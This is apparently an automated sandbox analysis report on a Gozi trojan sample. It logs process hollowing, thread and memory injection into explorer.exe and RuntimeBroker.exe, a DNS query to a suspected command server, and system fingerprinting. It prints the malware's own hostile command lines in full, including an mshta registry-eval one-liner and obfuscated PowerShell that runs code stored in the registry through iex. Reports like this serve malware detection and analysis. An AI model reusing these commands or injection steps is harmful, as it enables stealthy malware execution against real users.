Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	47_2_03052ECF

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress,

8_2_004012E6

Enables debug privileges

Source: C:\Users\user\Desktop\gozi.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\gozi.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F016AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		8_2_03F016AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030316AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		47_2_030316AF

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write

Allocates memory in foreign processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: C:\Windows\System32\control.exe base: F00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 2B40000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 20FDE800000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 163C5220000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D50000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580

Writes to foreign memory regions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7EDB112E0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory written: C:\Windows\System32\control.exe base: F00000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7EDB112E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 93E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2AE0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 2B40000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF71E075FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 20FDE800000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF71E075FD0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A2057C000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 5557E2E000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 163C5220000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB290B0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D50000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 93E000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2AE0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 940000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 2B40000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 5676	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe	Thread register set: target process: 4364
Source: C:\Windows\explorer.exe	Thread register set: target process: 4084
Source: C:\Windows\explorer.exe	Thread register set: target process: 4176
Source: C:\Windows\explorer.exe	Thread register set: target process: 4440
Source: C:\Windows\explorer.exe	Thread register set: target process: 6020

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\gozi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001F.00000000.484628610.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.505140631.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.503987373.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.488892190.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001F.00000000.493795912.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.495291649.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.514646186.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.521666713.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

8_2_00401AFE

Queries the installation date of Windows

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Users\user\Desktop\gozi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
